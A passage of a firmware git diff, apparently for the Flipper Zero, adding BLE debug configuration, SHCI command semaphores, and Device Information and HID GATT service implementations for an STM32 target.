++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef __BLE_DBG_CONF_H ++#define __BLE_DBG_CONF_H ++ ++/** ++ * Enable or Disable traces from BLE ++ */ ++ ++#define BLE_DBG_APP_EN 1 ++#define BLE_DBG_DIS_EN 1 ++#define BLE_DBG_HRS_EN 1 ++#define BLE_DBG_SVCCTL_EN 1 ++#define BLE_DBG_BLS_EN 1 ++#define BLE_DBG_HTS_EN 1 ++#define BLE_DBG_P2P_STM_EN 1 ++ ++/** ++ * Macro definition ++ */ ++#if(BLE_DBG_APP_EN != 0) ++#define BLE_DBG_APP_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_APP_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_DIS_EN != 0) ++#define BLE_DBG_DIS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_DIS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_HRS_EN != 0) ++#define BLE_DBG_HRS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_HRS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_P2P_STM_EN != 0) ++#define BLE_DBG_P2P_STM_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_P2P_STM_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_TEMPLATE_STM_EN != 0) ++#define BLE_DBG_TEMPLATE_STM_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_TEMPLATE_STM_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_EDS_STM_EN != 0) ++#define BLE_DBG_EDS_STM_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_EDS_STM_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_LBS_STM_EN != 0) ++#define BLE_DBG_LBS_STM_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_LBS_STM_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_SVCCTL_EN != 0) ++#define BLE_DBG_SVCCTL_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_SVCCTL_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_CTS_EN != 0) ++#define BLE_DBG_CTS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_CTS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_HIDS_EN != 0) ++#define BLE_DBG_HIDS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_HIDS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_PASS_EN != 0) ++#define BLE_DBG_PASS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_PASS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_BLS_EN != 0) ++#define BLE_DBG_BLS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_BLS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_HTS_EN != 0) ++#define BLE_DBG_HTS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_HTS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_ANS_EN != 0) ++#define BLE_DBG_ANS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_ANS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_ESS_EN != 0) ++#define BLE_DBG_ESS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_ESS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_GLS_EN != 0) ++#define BLE_DBG_GLS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_GLS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_BAS_EN != 0) ++#define BLE_DBG_BAS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_BAS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_RTUS_EN != 0) ++#define BLE_DBG_RTUS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_RTUS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_HPS_EN != 0) ++#define BLE_DBG_HPS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_HPS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_TPS_EN != 0) ++#define BLE_DBG_TPS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_TPS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_LLS_EN != 0) ++#define BLE_DBG_LLS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_LLS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_IAS_EN != 0) ++#define BLE_DBG_IAS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_IAS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_WSS_EN != 0) ++#define BLE_DBG_WSS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_WSS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_LNS_EN != 0) ++#define BLE_DBG_LNS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_LNS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_SCPS_EN != 0) ++#define BLE_DBG_SCPS_MSG PRINT_MESG_DBG ++#else ++#define BLE_DBG_SCPS_MSG PRINT_NO_MESG ++#endif ++ ++#if(BLE_DBG_DTS_EN != 0) ++#define BLE_DBG_DTS_MSG PRINT_MESG_DBG ++#define BLE_DBG_DTS_BUF PRINT_LOG_BUFF_DBG ++#else ++#define BLE_DBG_DTS_MSG PRINT_NO_MESG ++#define BLE_DBG_DTS_BUF PRINT_NO_MESG ++#endif ++ ++#endif /*__BLE_DBG_CONF_H */ ++ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/ble_glue.c b/firmware/targets/f7/ble_glue/ble_glue.c +index 5f129ba8c..2c30612b5 100644 +--- a/firmware/targets/f7/ble_glue/ble_glue.c ++++ b/firmware/targets/f7/ble_glue/ble_glue.c +@@ -32,6 +32,7 @@ static uint8_t ble_glue_ble_spare_event_buff[sizeof(TL_PacketHeader_t) + TL_EVT_ + + typedef struct { + FuriMutex* shci_mtx; ++ FuriSemaphore* shci_sem; + FuriThread* thread; + BleGlueStatus status; + BleGlueKeyStorageChangedCallback callback; +@@ -103,6 +104,7 @@ void ble_glue_init() { + TL_Init(); + + ble_glue->shci_mtx = furi_mutex_alloc(FuriMutexTypeNormal); ++ ble_glue->shci_sem = furi_semaphore_alloc(1, 0); + + // FreeRTOS system task creation + ble_glue->thread = furi_thread_alloc_ex("BleShciDriver", 1024, ble_glue_shci_thread, ble_glue); +@@ -391,6 +393,7 @@ void ble_glue_thread_stop() { + furi_thread_free(ble_glue->thread); + // Free resources + furi_mutex_free(ble_glue->shci_mtx); ++ furi_semaphore_free(ble_glue->shci_sem); + ble_glue_clear_shared_memory(); + free(ble_glue); + ble_glue = NULL; +@@ -424,6 +427,22 @@ void shci_notify_asynch_evt(void* pdata) { + } + } + ++void shci_cmd_resp_release(uint32_t flag) { ++ UNUSED(flag); ++ if(ble_glue) { ++ furi_semaphore_release(ble_glue->shci_sem); ++ } ++} ++ ++void shci_cmd_resp_wait(uint32_t timeout) { ++ UNUSED(timeout); ++ if(ble_glue) { ++ furi_hal_power_insomnia_enter(); ++ furi_semaphore_acquire(ble_glue->shci_sem, FuriWaitForever); ++ furi_hal_power_insomnia_exit(); ++ } ++} ++ + bool ble_glue_reinit_c2() { + return SHCI_C2_Reinit() == SHCI_Success; + } +diff --git a/firmware/targets/f7/ble_glue/compiler.h b/firmware/targets/f7/ble_glue/compiler.h +index 1d32c2a2e..98a93d712 100644 +--- a/firmware/targets/f7/ble_glue/compiler.h ++++ b/firmware/targets/f7/ble_glue/compiler.h +@@ -1,4 +1,22 @@ +-#pragma once ++/***************************************************************************** ++ * @file compiler.h ++ * @author MDG ++ * @brief This file contains the definitions which are compiler dependent. ++ ***************************************************************************** ++ * @attention ++ * ++ * Copyright (c) 2018-2023 STMicroelectronics. ++ * All rights reserved. ++ * ++ * This software is licensed under terms that can be found in the LICENSE file ++ * in the root directory of this software component. ++ * If no LICENSE file comes with this software, it is provided AS-IS. ++ * ++ ***************************************************************************** ++ */ ++ ++#ifndef COMPILER_H__ ++#define COMPILER_H__ + + #ifndef __PACKED_STRUCT + #define __PACKED_STRUCT PACKED(struct) +@@ -136,3 +154,5 @@ + #endif + #endif + #endif ++ ++#endif /* COMPILER_H__ */ +diff --git a/firmware/targets/f7/ble_glue/dev_info_service.c b/firmware/targets/f7/ble_glue/dev_info_service.c +new file mode 100644 +index 000000000..d24058632 +--- /dev/null ++++ b/firmware/targets/f7/ble_glue/dev_info_service.c +@@ -0,0 +1,220 @@ ++#include "dev_info_service.h" ++#include "app_common.h" ++#include ++ ++#include ++#include ++#include ++ ++#define TAG "BtDevInfoSvc" ++ ++typedef struct { ++ uint16_t service_handle; ++ uint16_t man_name_char_handle; ++ uint16_t serial_num_char_handle; ++ uint16_t firmware_rev_char_handle; ++ uint16_t software_rev_char_handle; ++ uint16_t rpc_version_char_handle; ++ FuriString* version_string; ++ char hardware_revision[4]; ++} DevInfoSvc; ++ ++static DevInfoSvc* dev_info_svc = NULL; ++ ++static const char dev_info_man_name[] = "Flipper Devices Inc."; ++static const char dev_info_serial_num[] = "1.0"; ++static const char dev_info_rpc_version[] = TOSTRING(PROTOBUF_MAJOR_VERSION.PROTOBUF_MINOR_VERSION); ++ ++static const uint8_t dev_info_rpc_version_uuid[] = ++ {0x33, 0xa9, 0xb5, 0x3e, 0x87, 0x5d, 0x1a, 0x8e, 0xc8, 0x47, 0x5e, 0xae, 0x6d, 0x66, 0xf6, 0x03}; ++ ++void dev_info_svc_start() { ++ dev_info_svc = malloc(sizeof(DevInfoSvc)); ++ dev_info_svc->version_string = furi_string_alloc_printf( ++ "%s %s %s %s", ++ version_get_githash(NULL), ++ version_get_version(NULL), ++ version_get_gitbranchnum(NULL), ++ version_get_builddate(NULL)); ++ snprintf( ++ dev_info_svc->hardware_revision, ++ sizeof(dev_info_svc->hardware_revision), ++ "%d", ++ version_get_target(NULL)); ++ tBleStatus status; ++ ++ // Add Device Information Service ++ uint16_t uuid = DEVICE_INFORMATION_SERVICE_UUID; ++ status = aci_gatt_add_service( ++ UUID_TYPE_16, (Service_UUID_t*)&uuid, PRIMARY_SERVICE, 11, &dev_info_svc->service_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add Device Information Service: %d", status); ++ } ++ ++ // Add characteristics ++ uuid = MANUFACTURER_NAME_UUID; ++ status = aci_gatt_add_char( ++ dev_info_svc->service_handle, ++ UUID_TYPE_16, ++ (Char_UUID_t*)&uuid, ++ strlen(dev_info_man_name), ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &dev_info_svc->man_name_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add manufacturer name char: %d", status); ++ } ++ uuid = SERIAL_NUMBER_UUID; ++ status = aci_gatt_add_char( ++ dev_info_svc->service_handle, ++ UUID_TYPE_16, ++ (Char_UUID_t*)&uuid, ++ strlen(dev_info_serial_num), ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &dev_info_svc->serial_num_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add serial number char: %d", status); ++ } ++ uuid = FIRMWARE_REVISION_UUID; ++ status = aci_gatt_add_char( ++ dev_info_svc->service_handle, ++ UUID_TYPE_16, ++ (Char_UUID_t*)&uuid, ++ strlen(dev_info_svc->hardware_revision), ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &dev_info_svc->firmware_rev_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add firmware revision char: %d", status); ++ } ++ uuid = SOFTWARE_REVISION_UUID; ++ status = aci_gatt_add_char( ++ dev_info_svc->service_handle, ++ UUID_TYPE_16, ++ (Char_UUID_t*)&uuid, ++ furi_string_size(dev_info_svc->version_string), ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &dev_info_svc->software_rev_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add software revision char: %d", status); ++ } ++ status = aci_gatt_add_char( ++ dev_info_svc->service_handle, ++ UUID_TYPE_128, ++ (const Char_UUID_t*)dev_info_rpc_version_uuid, ++ strlen(dev_info_rpc_version), ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_AUTHEN_READ, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &dev_info_svc->rpc_version_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add rpc version characteristic: %d", status); ++ } ++ ++ // Update characteristics ++ status = aci_gatt_update_char_value( ++ dev_info_svc->service_handle, ++ dev_info_svc->man_name_char_handle, ++ 0, ++ strlen(dev_info_man_name), ++ (uint8_t*)dev_info_man_name); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to update manufacturer name char: %d", status); ++ } ++ status = aci_gatt_update_char_value( ++ dev_info_svc->service_handle, ++ dev_info_svc->serial_num_char_handle, ++ 0, ++ strlen(dev_info_serial_num), ++ (uint8_t*)dev_info_serial_num); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to update serial number char: %d", status); ++ } ++ status = aci_gatt_update_char_value( ++ dev_info_svc->service_handle, ++ dev_info_svc->firmware_rev_char_handle, ++ 0, ++ strlen(dev_info_svc->hardware_revision), ++ (uint8_t*)dev_info_svc->hardware_revision); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to update firmware revision char: %d", status); ++ } ++ status = aci_gatt_update_char_value( ++ dev_info_svc->service_handle, ++ dev_info_svc->software_rev_char_handle, ++ 0, ++ furi_string_size(dev_info_svc->version_string), ++ (uint8_t*)furi_string_get_cstr(dev_info_svc->version_string)); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to update software revision char: %d", status); ++ } ++ status = aci_gatt_update_char_value( ++ dev_info_svc->service_handle, ++ dev_info_svc->rpc_version_char_handle, ++ 0, ++ strlen(dev_info_rpc_version), ++ (uint8_t*)dev_info_rpc_version); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to update rpc version char: %d", status); ++ } ++} ++ ++void dev_info_svc_stop() { ++ tBleStatus status; ++ if(dev_info_svc) { ++ furi_string_free(dev_info_svc->version_string); ++ // Delete service characteristics ++ status = ++ aci_gatt_del_char(dev_info_svc->service_handle, dev_info_svc->man_name_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete manufacturer name char: %d", status); ++ } ++ status = ++ aci_gatt_del_char(dev_info_svc->service_handle, dev_info_svc->serial_num_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete serial number char: %d", status); ++ } ++ status = aci_gatt_del_char( ++ dev_info_svc->service_handle, dev_info_svc->firmware_rev_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete firmware revision char: %d", status); ++ } ++ status = aci_gatt_del_char( ++ dev_info_svc->service_handle, dev_info_svc->software_rev_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete software revision char: %d", status); ++ } ++ status = ++ aci_gatt_del_char(dev_info_svc->service_handle, dev_info_svc->rpc_version_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete rpc version char: %d", status); ++ } ++ // Delete service ++ status = aci_gatt_del_service(dev_info_svc->service_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete device info service: %d", status); ++ } ++ free(dev_info_svc); ++ dev_info_svc = NULL; ++ } ++} ++ ++bool dev_info_svc_is_started() { ++ return dev_info_svc != NULL; ++} +diff --git a/firmware/targets/f7/ble_glue/services/dev_info_service.h b/firmware/targets/f7/ble_glue/dev_info_service.h +similarity index 100% +rename from firmware/targets/f7/ble_glue/services/dev_info_service.h +rename to firmware/targets/f7/ble_glue/dev_info_service.h +diff --git a/firmware/targets/f7/ble_glue/hid_service.c b/firmware/targets/f7/ble_glue/hid_service.c +new file mode 100644 +index 000000000..a31d6015f +--- /dev/null ++++ b/firmware/targets/f7/ble_glue/hid_service.c +@@ -0,0 +1,416 @@ ++#include "hid_service.h" ++#include "app_common.h" ++#include ++ ++#include ++ ++#define TAG "BtHid" ++ ++typedef struct { ++ uint16_t svc_handle; ++ uint16_t protocol_mode_char_handle; ++ uint16_t report_char_handle[HID_SVC_REPORT_COUNT]; ++ uint16_t report_ref_desc_handle[HID_SVC_REPORT_COUNT]; ++ uint16_t report_map_char_handle; ++ uint16_t info_char_handle; ++ uint16_t ctrl_point_char_handle; ++ // led state ++ uint16_t led_state_char_handle; ++ uint16_t led_state_desc_handle; ++ HidLedStateEventCallback led_state_event_callback; ++ void* led_state_ctx; ++} HIDSvc; ++ ++static HIDSvc* hid_svc = NULL; ++ ++static SVCCTL_EvtAckStatus_t hid_svc_event_handler(void* event) { ++ SVCCTL_EvtAckStatus_t ret = SVCCTL_EvtNotAck; ++ hci_event_pckt* event_pckt = (hci_event_pckt*)(((hci_uart_pckt*)event)->data); ++ evt_blecore_aci* blecore_evt = (evt_blecore_aci*)event_pckt->data; ++ // aci_gatt_attribute_modified_event_rp0* attribute_modified; ++ if(event_pckt->evt == HCI_VENDOR_SPECIFIC_DEBUG_EVT_CODE) { ++ if(blecore_evt->ecode == ACI_GATT_ATTRIBUTE_MODIFIED_VSEVT_CODE) { ++ // Process modification events ++ ret = SVCCTL_EvtAckFlowEnable; ++ } else if(blecore_evt->ecode == ACI_GATT_SERVER_CONFIRMATION_VSEVT_CODE) { ++ // Process notification confirmation ++ ret = SVCCTL_EvtAckFlowEnable; ++ } else if(blecore_evt->ecode == ACI_GATT_WRITE_PERMIT_REQ_VSEVT_CODE) { ++ // Process write request ++ aci_gatt_write_permit_req_event_rp0* req = ++ (aci_gatt_write_permit_req_event_rp0*)blecore_evt->data; ++ ++ furi_check(hid_svc->led_state_event_callback && hid_svc->led_state_ctx); ++ ++ // this check is likely to be incorrect, it will actually work in our case ++ // but we need to investigate gatt api to see what is the rules ++ // that specify attibute handle value from char handle (or the reverse) ++ if(req->Attribute_Handle == (hid_svc->led_state_char_handle + 1)) { ++ hid_svc->led_state_event_callback(req->Data[0], hid_svc->led_state_ctx); ++ aci_gatt_write_resp( ++ req->Connection_Handle, ++ req->Attribute_Handle, ++ 0x00, /* write_status = 0 (no error))*/ ++ 0x00, /* err_code */ ++ req->Data_Length, ++ req->Data); ++ aci_gatt_write_char_value( ++ req->Connection_Handle, ++ hid_svc->led_state_char_handle, ++ req->Data_Length, ++ req->Data); ++ ret = SVCCTL_EvtAckFlowEnable; ++ } ++ } ++ } ++ return ret; ++} ++ ++void hid_svc_start() { ++ tBleStatus status; ++ hid_svc = malloc(sizeof(HIDSvc)); ++ Service_UUID_t svc_uuid = {}; ++ Char_Desc_Uuid_t desc_uuid = {}; ++ Char_UUID_t char_uuid = {}; ++ ++ // Register event handler ++ SVCCTL_RegisterSvcHandler(hid_svc_event_handler); ++ // Add service ++ svc_uuid.Service_UUID_16 = HUMAN_INTERFACE_DEVICE_SERVICE_UUID; ++ /** ++ * Add Human Interface Device Service ++ */ ++ status = aci_gatt_add_service( ++ UUID_TYPE_16, ++ &svc_uuid, ++ PRIMARY_SERVICE, ++ 2 + /* protocol mode */ ++ (4 * HID_SVC_INPUT_REPORT_COUNT) + (3 * HID_SVC_OUTPUT_REPORT_COUNT) + ++ (3 * HID_SVC_FEATURE_REPORT_COUNT) + 1 + 2 + 2 + 2 + ++ 4, /* Service + Report Map + HID Information + HID Control Point + LED state */ ++ &hid_svc->svc_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add HID service: %d", status); ++ } ++ // Add Protocol mode characteristics ++ char_uuid.Char_UUID_16 = PROTOCOL_MODE_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ 1, ++ CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP, ++ ATTR_PERMISSION_NONE, ++ GATT_NOTIFY_ATTRIBUTE_WRITE, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &hid_svc->protocol_mode_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add protocol mode characteristic: %d", status); ++ } ++ // Update Protocol mode characteristic ++ uint8_t protocol_mode = 1; ++ status = aci_gatt_update_char_value( ++ hid_svc->svc_handle, hid_svc->protocol_mode_char_handle, 0, 1, &protocol_mode); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to update protocol mode characteristic: %d", status); ++ } ++ ++#if(HID_SVC_REPORT_COUNT != 0) ++ for(uint8_t i = 0; i < HID_SVC_REPORT_COUNT; i++) { ++ if(i < HID_SVC_INPUT_REPORT_COUNT) { //-V547 ++ uint8_t buf[2] = {i + 1, 1}; // 1 input ++ char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ HID_SVC_REPORT_MAX_LEN, ++ CHAR_PROP_READ | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_NONE, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_VARIABLE, ++ &(hid_svc->report_char_handle[i])); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report characteristic: %d", status); ++ } ++ ++ desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; ++ status = aci_gatt_add_char_desc( ++ hid_svc->svc_handle, ++ hid_svc->report_char_handle[i], ++ UUID_TYPE_16, ++ &desc_uuid, ++ HID_SVC_REPORT_REF_LEN, ++ HID_SVC_REPORT_REF_LEN, ++ buf, ++ ATTR_PERMISSION_NONE, ++ ATTR_ACCESS_READ_WRITE, ++ GATT_DONT_NOTIFY_EVENTS, ++ MIN_ENCRY_KEY_SIZE, ++ CHAR_VALUE_LEN_CONSTANT, ++ &(hid_svc->report_ref_desc_handle[i])); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report reference descriptor: %d", status); ++ } ++ } else if((i - HID_SVC_INPUT_REPORT_COUNT) < HID_SVC_OUTPUT_REPORT_COUNT) { ++ uint8_t buf[2] = {i + 1, 2}; // 2 output ++ char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ HID_SVC_REPORT_MAX_LEN, ++ CHAR_PROP_READ | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_NONE, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_VARIABLE, ++ &(hid_svc->report_char_handle[i])); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report characteristic: %d", status); ++ } ++ ++ desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; ++ status = aci_gatt_add_char_desc( ++ hid_svc->svc_handle, ++ hid_svc->report_char_handle[i], ++ UUID_TYPE_16, ++ &desc_uuid, ++ HID_SVC_REPORT_REF_LEN, ++ HID_SVC_REPORT_REF_LEN, ++ buf, ++ ATTR_PERMISSION_NONE, ++ ATTR_ACCESS_READ_WRITE, ++ GATT_DONT_NOTIFY_EVENTS, ++ MIN_ENCRY_KEY_SIZE, ++ CHAR_VALUE_LEN_CONSTANT, ++ &(hid_svc->report_ref_desc_handle[i])); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report reference descriptor: %d", status); ++ } ++ } else { ++ uint8_t buf[2] = {i + 1, 3}; // 3 feature ++ char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ HID_SVC_REPORT_MAX_LEN, ++ CHAR_PROP_READ | CHAR_PROP_NOTIFY, ++ ATTR_PERMISSION_NONE, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_VARIABLE, ++ &(hid_svc->report_char_handle[i])); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report characteristic: %d", status); ++ } ++ ++ desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; ++ status = aci_gatt_add_char_desc( ++ hid_svc->svc_handle, ++ hid_svc->report_char_handle[i], ++ UUID_TYPE_16, ++ &desc_uuid, ++ HID_SVC_REPORT_REF_LEN, ++ HID_SVC_REPORT_REF_LEN, ++ buf, ++ ATTR_PERMISSION_NONE, ++ ATTR_ACCESS_READ_WRITE, ++ GATT_DONT_NOTIFY_EVENTS, ++ MIN_ENCRY_KEY_SIZE, ++ CHAR_VALUE_LEN_CONSTANT, ++ &(hid_svc->report_ref_desc_handle[i])); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report reference descriptor: %d", status); ++ } ++ } ++ } ++#endif ++ // Add led state output report ++ char_uuid.Char_UUID_16 = REPORT_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ 1, ++ CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE, ++ ATTR_PERMISSION_NONE, ++ GATT_NOTIFY_ATTRIBUTE_WRITE | GATT_NOTIFY_WRITE_REQ_AND_WAIT_FOR_APPL_RESP, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &(hid_svc->led_state_char_handle)); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add led state characteristic: %d", status); ++ } ++ ++ // Add led state char descriptor specifying it is an output report ++ uint8_t buf[2] = {HID_SVC_REPORT_COUNT + 1, 2}; ++ desc_uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID; ++ status = aci_gatt_add_char_desc( ++ hid_svc->svc_handle, ++ hid_svc->led_state_char_handle, ++ UUID_TYPE_16, ++ &desc_uuid, ++ HID_SVC_REPORT_REF_LEN, ++ HID_SVC_REPORT_REF_LEN, ++ buf, ++ ATTR_PERMISSION_NONE, ++ ATTR_ACCESS_READ_WRITE, ++ GATT_DONT_NOTIFY_EVENTS, ++ MIN_ENCRY_KEY_SIZE, ++ CHAR_VALUE_LEN_CONSTANT, ++ &(hid_svc->led_state_desc_handle)); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add led state descriptor: %d", status); ++ } ++ // Add Report Map characteristic ++ char_uuid.Char_UUID_16 = REPORT_MAP_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ HID_SVC_REPORT_MAP_MAX_LEN, ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_NONE, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_VARIABLE, ++ &hid_svc->report_map_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add report map characteristic: %d", status); ++ } ++ ++ // Add Information characteristic ++ char_uuid.Char_UUID_16 = HID_INFORMATION_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ HID_SVC_INFO_LEN, ++ CHAR_PROP_READ, ++ ATTR_PERMISSION_NONE, ++ GATT_DONT_NOTIFY_EVENTS, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &hid_svc->info_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add information characteristic: %d", status); ++ } ++ // Add Control Point characteristic ++ char_uuid.Char_UUID_16 = HID_CONTROL_POINT_CHAR_UUID; ++ status = aci_gatt_add_char( ++ hid_svc->svc_handle, ++ UUID_TYPE_16, ++ &char_uuid, ++ HID_SVC_CONTROL_POINT_LEN, ++ CHAR_PROP_WRITE_WITHOUT_RESP, ++ ATTR_PERMISSION_NONE, ++ GATT_NOTIFY_ATTRIBUTE_WRITE, ++ 10, ++ CHAR_VALUE_LEN_CONSTANT, ++ &hid_svc->ctrl_point_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to add control point characteristic: %d", status); ++ } ++ ++ hid_svc->led_state_event_callback = NULL; ++ hid_svc->led_state_ctx = NULL; ++} ++ ++bool hid_svc_update_report_map(const uint8_t* data, uint16_t len) { ++ furi_assert(data); ++ furi_assert(hid_svc); ++ ++ tBleStatus status = aci_gatt_update_char_value( ++ hid_svc->svc_handle, hid_svc->report_map_char_handle, 0, len, data); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed updating report map characteristic: %d", status); ++ return false; ++ } ++ return true; ++} ++ ++bool hid_svc_update_input_report(uint8_t input_report_num, uint8_t* data, uint16_t len) { ++ furi_assert(data); ++ furi_assert(hid_svc); ++ ++ tBleStatus status = aci_gatt_update_char_value( ++ hid_svc->svc_handle, 